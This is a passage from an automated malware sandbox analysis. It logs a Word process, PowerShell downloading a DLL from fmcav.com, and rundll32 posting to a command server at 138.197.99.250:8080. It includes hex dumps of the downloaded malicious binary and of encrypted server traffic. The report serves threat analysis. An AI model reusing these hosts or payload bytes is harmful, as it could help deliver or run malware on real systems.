Jan 7, 2021 16:33:40.264686108 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264728069 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264751911 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264779091 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264821053 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264843941 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264862061 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264903069 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264925003 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.264944077 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.264985085 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265014887 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265033007 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265078068 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265099049 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265116930 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265156984 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265177965 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265197039 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265237093 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265264034 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265275002 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265315056 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265363932 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265398026 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265454054 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265501022 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265521049 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265541077 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265582085 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265604973 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265621901 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265671015 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265691996 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265716076 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265754938 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265784025 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265795946 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265836000 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265862942 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265872955 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265914917 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.265940905 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.265954018 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266002893 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266011953 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266046047 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266083956 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266105890 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266123056 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266160965 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266191959 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266199112 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266239882 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266263008 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266278028 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266329050 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266345978 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266374111 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266412020 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266436100 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266450882 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266490936 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266511917 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266527891 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266568899 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266591072 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266607046 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266654968 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266669989 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266699076 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266737938 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266761065 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266783953 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266843081 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266850948 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266881943 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266921997 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.266943932 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.266963959 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.267011881 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.267031908 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.267060041 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.267097950 CET	80	49165	35.208.84.24	192.168.2.22
Jan 7, 2021 16:33:40.267126083 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.469037056 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:33:40.575814962 CET	49165	80	192.168.2.22	35.208.84.24
Jan 7, 2021 16:34:00.013307095 CET	49166	80	192.168.2.22	152.170.79.100
Jan 7, 2021 16:34:03.028862953 CET	49166	80	192.168.2.22	152.170.79.100
Jan 7, 2021 16:34:11.080439091 CET	49167	80	192.168.2.22	190.247.139.101
Jan 7, 2021 16:34:14.090140104 CET	49167	80	192.168.2.22	190.247.139.101
Jan 7, 2021 16:34:20.096731901 CET	49167	80	192.168.2.22	190.247.139.101
Jan 7, 2021 16:34:32.113158941 CET	49168	80	192.168.2.22	190.247.139.101
Jan 7, 2021 16:34:35.120709896 CET	49168	80	192.168.2.22	190.247.139.101
Jan 7, 2021 16:34:41.127393007 CET	49168	80	192.168.2.22	190.247.139.101
Jan 7, 2021 16:35:01.753525019 CET	49169	8080	192.168.2.22	138.197.99.250
Jan 7, 2021 16:35:01.877486944 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:01.877624989 CET	49169	8080	192.168.2.22	138.197.99.250
Jan 7, 2021 16:35:01.879575968 CET	49169	8080	192.168.2.22	138.197.99.250
Jan 7, 2021 16:35:01.879678965 CET	49169	8080	192.168.2.22	138.197.99.250
Jan 7, 2021 16:35:02.003442049 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:02.003629923 CET	49169	8080	192.168.2.22	138.197.99.250
Jan 7, 2021 16:35:02.003643990 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:02.003752947 CET	49169	8080	192.168.2.22	138.197.99.250
Jan 7, 2021 16:35:02.127396107 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:02.127443075 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:02.127651930 CET	49169	8080	192.168.2.22	138.197.99.250
Jan 7, 2021 16:35:02.251386881 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:02.688015938 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:02.688076973 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:02.688102007 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:02.688121080 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:02.688349009 CET	49169	8080	192.168.2.22	138.197.99.250
Jan 7, 2021 16:35:05.688508987 CET	8080	49169	138.197.99.250	192.168.2.22
Jan 7, 2021 16:35:05.688760996 CET	49169	8080	192.168.2.22	138.197.99.250

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2021 16:33:38.814709902 CET	52197	53	192.168.2.22	8.8.8.8
Jan 7, 2021 16:33:38.978018045 CET	53	52197	8.8.8.8	192.168.2.22

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 7, 2021 16:34:02.945343018 CET	152.170.79.100	192.168.2.22	a7f2	(Host unreachable)	Destination Unreachable
Jan 7, 2021 16:34:05.971611023 CET	152.170.79.100	192.168.2.22	a7f2	(Host unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 7, 2021 16:33:38.814709902 CET	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	fmcav.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 7, 2021 16:33:38.978018045 CET	8.8.8.8	192.168.2.22	0x26d4	No error (0)	fmcav.com		35.208.84.24	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

fmcav.com

138.197.99.250

138.197.99.250:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	35.208.84.24	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 16:33:39.152623892 CET	0	OUT	GET /images/7FV4Nd/ HTTP/1.1 Host: fmcav.com Connection: Keep-Alive
Jan 7, 2021 16:33:39.346890926 CET	1	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Jan 2021 15:33:30 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Thu, 07 Jan 2021 15:33:30 GMT Content-Disposition: attachment; filename="jrwyxEfYdpi9N0GWukkQG0.dll" Content-Transfer-Encoding: binary Set-Cookie: 5ff729cacd408=1610033610; expires=Thu, 07-Jan-2021 15:34:30 GMT; Max-Age=60; path=/ Last-Modified: Thu, 07 Jan 2021 15:33:30 GMT X-Httpd: 1 Host-Header: 6b7412fb82ca5edfd0917e3957f05d89 X-Proxy-Cache: MISS X-Proxy-Cache-Info: W NC:000000 UP:SKIP_CACHE_NO_CACHE Data Raw: 66 63 61 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 f3 83 42 b5 92 ed 11 b5 92 ed 11 b5 92 ed 11 a1 f9 ee 10 be 92 ed 11 a1 f9 e8 10 3d 92 ed 11 a1 f9 e9 10 a7 92 ed 11 4d e2 e9 10 ba 92 ed 11 4d e2 ee 10 a4 92 ed 11 4d e2 e8 10 94 92 ed 11 a1 f9 ec 10 b2 92 ed 11 b5 92 ec 11 39 92 ed 11 02 e3 e8 10 b6 92 ed 11 02 e3 ed 10 b4 92 ed 11 02 e3 12 11 b4 92 ed 11 b5 92 7a 11 b4 92 ed 11 02 e3 ef 10 b4 92 ed 11 52 69 63 68 b5 92 ed 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 16 00 ed 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 10 04 00 00 9e 02 00 00 00 00 00 81 3c 00 00 00 10 00 00 00 20 04 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 06 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 b7 04 00 50 00 00 00 b0 b7 04 00 50 00 00 00 00 f0 04 00 c0 b3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 06 00 94 25 00 00 3c a2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 a2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 04 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 0f 04 00 00 10 00 00 00 10 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e0 a3 00 00 00 20 04 00 00 a4 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 1e 00 00 00 d0 04 00 00 0c 00 00 00 b8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 b3 01 00 00 f0 04 00 00 b4 01 00 00 c4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 Data Ascii: fca0MZ@!L!This program cannot be run in DOS mode.$B=MMM9zRichPEL_!< `PP%<T@ <.textc `.rdata @@.data@.rsrc@@.re
Jan 7, 2021 16:33:39.346950054 CET	3	IN	Data Raw: 6c 6f 63 00 00 94 25 00 00 00 b0 06 00 00 26 00 00 00 78 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: loc%&x@B
Jan 7, 2021 16:33:39.346981049 CET	4	IN	Data Raw: 00 00 00 68 ca 00 00 00 50 ff 15 c0 21 04 10 81 ff ca 00 00 00 75 18 a1 cc db 04 10 85 c0 74 ba 50 ff 15 34 20 04 10 89 35 cc db 04 10 eb ab 8d 45 ec 50 53 ff 15 d4 21 04 10 8d 45 ec 50 ff 15 3c 20 04 10 a3 cc db 04 10 eb 0c c6 00 00 eb 07 53 ff Data Ascii: hP!utP4 5EPS!EP< S"M3_^3[#UQQVu"jP4"3VhP"t@hVVu!8fEEEEEP58Q43^Uu"jP4"jh
Jan 7, 2021 16:33:39.347011089 CET	5	IN	Data Raw: d7 ff 75 88 ff d7 53 ff 15 f0 21 04 10 83 bd 6c ff ff ff 00 8b f0 74 7e 56 ff 15 20 20 04 10 ff b5 74 ff ff ff 89 45 80 56 ff 15 1c 20 04 10 56 ff 15 18 20 04 10 68 80 00 80 00 6a 01 6a 00 ff 15 44 20 04 10 50 56 89 45 88 ff 15 14 20 04 10 8b 4d Data Ascii: uS!lt~V tEV V hjjD PVE M;M}'jSjV SuV, ;]\|huV$ ut\|pV hjjD PVh }\|;}}%jjWV uWV,
Jan 7, 2021 16:33:39.347052097 CET	7	IN	Data Raw: 8c 6d ff ff ff 8b 7d 10 8a 45 ff 5e 88 3f 88 47 01 5f 5b c9 c3 55 8b ec 8b 4d 0c 8b 55 08 53 8a 01 8a 1a 88 02 88 19 5b 5d c3 83 79 04 00 b8 bc 22 04 10 0f 45 41 04 c3 55 8b ec 83 ec 24 a1 54 d0 04 10 33 c5 89 45 fc 53 56 8b 35 f8 20 04 10 57 68 Data Ascii: m}E^?G_[UMUS[]y"EAU$T3ESV5 Wh#3Eh#]]EUE#VPV5 PWh,#WX\EPh@#YPEPhX5"SSSSSSSSSSS
Jan 7, 2021 16:33:39.347090006 CET	8	IN	Data Raw: 8b ec 8b 45 08 85 c0 74 17 83 78 14 00 75 11 8b 48 2c 85 c9 74 0a 83 78 18 00 74 04 ff d1 eb 03 83 c8 ff 5d c2 04 00 55 8b ec 8b 45 08 3b 45 0c 73 0c 6a 0d ff 15 f4 20 04 10 33 c0 eb 03 33 c0 40 5d c2 08 00 55 8b ec 51 51 83 65 f8 00 8b d1 53 8b Data Ascii: EtxuH,txt]UE;Esj 33@]UQQeS]VW3UKMx$f;pu8Ep8~~jhVP!EVjPGGGGPubt]EjhwP!tCwG7EuPV
Jan 7, 2021 16:33:39.347131968 CET	10	IN	Data Raw: ff 75 0c e8 e5 fa ff ff 85 c0 0f 84 08 02 00 00 8b 5f 3c 03 df 81 3b 50 45 00 00 0f 85 ec 01 00 00 b8 4c 01 00 00 66 39 43 04 0f 85 dd 01 00 00 f6 43 38 01 0f 85 d3 01 00 00 0f b7 43 14 0f b7 7b 06 83 c0 24 85 ff 74 25 8b 4d fc 8d 14 18 83 7a 04 Data Ascii: u_<;PELf9CC8C{$t%MzC8EBR(;FuMEPxMEHQy{P##;vjh0Ws4!Eujh0WP!EujFj4j P MuhPQ
Jan 7, 2021 16:33:39.347181082 CET	11	IN	Data Raw: 25 00 20 04 10 83 61 04 00 8b c1 83 61 08 00 c7 41 04 88 23 04 10 c7 01 d4 22 04 10 c3 55 8b ec 56 ff 75 08 8b f1 e8 97 e3 ff ff c7 06 9c 23 04 10 8b c6 5e 5d c2 04 00 83 61 04 00 8b c1 83 61 08 00 c7 01 9c 23 04 10 c3 55 8b ec 51 51 8b 45 08 56 Data Ascii: % aaA#"UVu#^]aa#UQQEVEEEV""bRPYY^UE"aaA]"aaUVu#^]UQVuup#^UVu
Jan 7, 2021 16:33:39.347223997 CET	12	IN	Data Raw: ec 83 ec 0c 8d 4d f4 e8 f2 fa ff ff 68 50 ae 04 10 8d 45 f4 50 e8 b0 18 00 00 cc 55 8b ec 83 ec 0c 8d 4d f4 ff 75 08 e8 61 fb ff ff 68 28 ad 04 10 8d 45 f4 50 e8 90 18 00 00 cc 55 8b ec 83 ec 0c 8d 4d f4 ff 75 08 e8 7b fb ff ff 68 80 ad 04 10 8d Data Ascii: MhPEPUMuah(EPUMu{hEPpUMuhEPPUMuhEP0UMuhEPUMu5h4EP#UuYt
Jan 7, 2021 16:33:39.347265959 CET	14	IN	Data Raw: 8b e8 a1 54 d0 04 10 33 c5 50 89 45 f0 ff 75 fc c7 45 fc ff ff ff ff 8d 45 f4 64 a3 00 00 00 00 f2 c3 50 64 ff 35 00 00 00 00 8d 44 24 0c 2b 64 24 0c 53 56 57 89 28 8b e8 a1 54 d0 04 10 33 c5 50 89 65 f0 ff 75 fc c7 45 fc ff ff ff ff 8d 45 f4 64 Data Ascii: T3PEuEEdPd5D$+d$SVW(T3PeuEEdPd5D$+d$SVW(T3PEeuEEdL)UEVL)tjV#YY^]UEt3t tt3@0uu
Jan 7, 2021 16:33:39.499109983 CET	15	IN	Data Raw: 3d 70 06 03 00 75 11 8b 3d 70 dc 04 10 83 cf 01 89 3d 70 dc 04 10 eb 06 8b 3d 70 dc 04 10 8b 4d e4 6a 07 58 89 4d fc 39 45 f4 7c 2f 33 c9 53 0f a2 8b f3 5b 8d 5d dc 89 03 89 73 04 89 4b 08 8b 4d fc 89 53 0c 8b 5d e0 f7 c3 00 02 00 00 74 0e 83 cf Data Ascii: =pu=p=p=pMjXM9E\|/3S[]sKMS]t=p]\l\l\tytq3EUEMj^#;uW\l\ t; l\#;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49169	138.197.99.250	8080	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 16:35:01.879575968 CET	452	OUT	POST /ms1mi/fn90mfko2oaz05ju8/jnqglo5fbrsmznurm/tiqz1milsrtd34u5/r0vm4ksa/2tfuy/ HTTP/1.1 DNT: 0 Referer: 138.197.99.250/ms1mi/fn90mfko2oaz05ju8/jnqglo5fbrsmznurm/tiqz1milsrtd34u5/r0vm4ksa/2tfuy/ Content-Type: multipart/form-data; boundary=---------FpCBZIWdY User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 138.197.99.250:8080 Content-Length: 6212 Connection: Keep-Alive Cache-Control: no-cache
Jan 7, 2021 16:35:02.688015938 CET	460	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Jan 2021 15:35:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 62 63 34 0d 0a 55 5a 46 db 0f 70 8d f3 f1 62 cc 7d 04 a4 a3 0f ec 12 fc ae b4 89 c3 71 83 bb c5 4a 90 cf 4f 06 4c 18 55 bc 1b c4 7a 53 35 0f 13 f8 34 6c 2f 9a 79 e8 f5 e9 dd 1e ca 93 df 54 25 25 90 50 53 d9 4b 56 2f 1b 29 a8 7c 30 77 10 77 8f c6 4b c7 be da c7 c4 79 4b 7b 2d 99 3b 98 94 9d ef e4 76 7a 70 64 3d 16 b3 35 12 73 22 3c 96 02 05 0b 30 bf 70 32 a0 f9 2e 9a 7f d0 cf 80 f8 6e 10 b7 e2 6c 7e 07 ab c8 5e 36 cd 73 dc ab d2 6d 82 b3 12 43 bc b7 d9 5d ca 7b 6a 08 a0 82 7e 15 b5 6d af a3 7e d5 03 07 05 f1 45 d9 1a 4a 9e a9 32 11 3e 67 e8 59 be e1 e8 38 e2 fd a8 bf 70 fd 54 9a 7d 05 0a 44 76 8a a1 7d 65 b3 22 46 3b 96 63 d6 7a b2 74 ff 44 c4 10 dd 43 d6 2b 6c 6e 5a 3e b0 a8 62 13 d9 ef d6 1b 9f c1 62 d3 bc db 81 82 b9 96 c8 78 11 8f 85 f1 fa b7 66 67 68 dd f6 ef 1a 01 18 d2 fa d0 cc 0b 36 8c 47 d5 31 bb b0 7e c3 28 d6 81 00 c5 f9 a4 69 12 a2 10 5e d7 3a e4 67 c8 28 25 0f f0 c3 cc 15 25 f6 01 6f e8 40 7a 1d 33 14 77 de bf 57 86 b7 7b 53 d4 2e f5 43 cf 84 65 0e a7 86 2f 23 ac 0e d2 2e 3e 43 76 a6 50 e2 58 04 ba 58 4d 58 fa dd cf fc 84 70 90 b4 b7 a1 9f df 8a 51 4b 82 f0 0b e4 3d 2e b9 d4 06 95 f0 2d 09 8b 6f 21 a2 92 f0 4a 91 9a 48 2f d4 18 99 58 c1 a5 7b 6d 72 66 82 d5 ac bf 64 4b 91 8b 2c 27 ed 64 d6 eb 24 9e a4 48 b4 2e cb 90 50 24 16 56 48 30 ca fc c5 cc f4 b6 b7 d8 83 b7 d8 f0 5d 74 e4 ba 99 1e a0 61 fa ea b3 be 75 50 f8 98 fb 2f ab 3d 6b 20 fb 90 de ea 8d 9c 63 46 16 06 09 8f 05 2f 70 ec 10 be 35 e9 89 6b a8 9f 67 66 4f 06 8a 37 6b db ba c0 2e 3c 7b 00 76 8f dc c5 8f ee 24 c9 d5 66 70 c2 2d 2a 5a 71 e6 a9 d0 32 e7 2c 96 1b d7 cf 48 c7 67 a2 1d 98 48 11 5e 09 ba 9c 4c 1b 4c 59 0b e4 47 e4 46 47 ff a6 45 40 e0 61 c0 f6 ab fe 93 8d e5 2f be 85 55 b6 47 c7 3b 9a 11 43 a4 b4 22 67 6a e0 d8 33 77 c6 e5 87 a4 26 72 99 8d 78 86 1a 26 eb 3c 96 5c b9 13 f6 f6 87 68 8c 5f 67 8c d4 7f e2 ef 0d 7e ca 61 f5 24 37 dd 9e de bf f0 c5 7f bc 19 cb e1 9c 39 f7 4a 8e 95 0b 20 da 74 3f ca f5 90 27 2d 7e ae dd 1a 7e 21 81 e6 a0 f4 fb 85 33 b6 df 29 ae 6a a0 3b fb 67 66 76 34 75 7c f4 66 56 52 86 86 d1 81 d7 d4 9d 20 cb f0 99 e9 02 07 5c 11 57 b1 a6 09 3e 76 d8 31 3b 44 7d 5b 2b 51 78 8f 56 12 c3 c1 7c 3a d9 e5 45 5f 3f db 41 ad cb eb da 3c fb 0d 3d 89 09 a5 a4 f5 3d 79 7d a8 b4 d4 ed 8f a7 23 92 e5 fb 52 52 aa 17 0c 86 f3 7a 5a 77 a6 bd 4a f4 5b 0b e2 78 d9 89 1d 16 45 0d 6e b6 68 9d 81 9a f4 82 1b 28 76 cb 59 b7 90 db 8c ab 19 e3 bd 4a cf 92 53 6b 8d ce 8e 82 21 5f f9 7b 31 67 36 5e 82 8b b3 79 e3 3a 7f 42 40 26 f8 bc d7 9c de 3a a7 1d 10 bc 0f 68 cd f2 d3 39 fe d7 95 15 20 8f 4e e2 8e f8 0f 5e e6 b7 6a 8d c3 d9 69 cd fb bc 36 6b 25 63 9c b3 68 32 70 20 4d d9 cc 35 e2 52 5f 46 28 30 52 11 1b bd 8d 2b d8 60 dd 2e 2e ff 76 28 62 5e fb 6e d9 e4 72 db 60 cd 57 a8 35 bc 9c 29 87 62 01 ae 47 c5 54 ab 3c 9f dc bc e6 50 70 6c a4 b0 16 73 4a e5 47 71 4c 78 6e 96 9a 55 4f cb 9f c7 7c 95 2a 4d 65 d5 34 25 c9 90 15 a8 15 65 7d 4a 8d db 68 c4 1d 57 e1 93 26 47 b2 43 e2 8f 83 ae b7 76 70 15 12 ce fb 58 6e 37 db 90 09 5c 55 94 77 75 a4 9d 0f 8d 53 29 ef 89 db 31 f4 08 6c af 6b 98 b6 37 35 92 09 45 a2 5a db fd 47 92 f3 2a 15 71 30 52 16 fb 8c 36 e6 43 d9 fb 76 f3 e1 7c 79 9f de 9d f0 d9 34 d5 64 88 a0 58 db a5 b5 97 41 ef 8b 2b c2 fb ad 48 b7 b6 6c b2 09 66 67 2a b8 10 f9 ef af 63 07 d9 93 4a 43 eb 56 91 d3 6e e8 f0 fa 91 aa 0c ee b8 de d8 a4 3f 28 c5 27 7c 22 b5 d6 41 13 6b bf dc d6 d5 8e fc ed ff fe f0 c1 ef 34 41 d3 14 87 95 b2 78 b1 c6 4e 9c ba d5 64 b8 77 c3 31 32 05 9d 75 ee 96 84 ba 94 e2 41 0c bb 56 c7 ba 4a 4d 95 25 Data Ascii: bc4UZFpb}qJOLUzS54l/yT%%PSKV/)\|0wwKyK{-;vzpd=5s"<0p2.nl~^6smC]{j~m~EJ2>gY8pT}Dv}e"F;cztDC+lnZ>bbxfgh6G1~(i^:g(%%o@z3wW{S.Ce/#.>CvPXXMXpQK=.-o!JH/X{mrfdK,'d$H.P$VH0]tauP/=k cF/p5kgfO7k.<{v$fp-Zq2,HgH^LLYGFGE@a/UG;C"gj3w&rx&<\h_g~a$79J t?'-~~!3)j;gfv4u\|fVR \W>v1;D}[+QxV\|:E_?A<==y}#RRzZwJ[xEnh(vYJSk!_{1g6^y:B@&:h9 N^ji6k%ch2p M5R_F(0R+`..v(b^nr`W5)bGT<PplsJGqLxnUO\|Me4%e}JhW&GCvpXn7\UwuS)1lk75EZGq0R6Cv\|y4dXA+HlfgcJCVn?('\|"Ak4AxNdw12uAVJM%

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1340 Parent PID: 584

General

Start time:	16:33:34
Start date:	07/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fc60000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
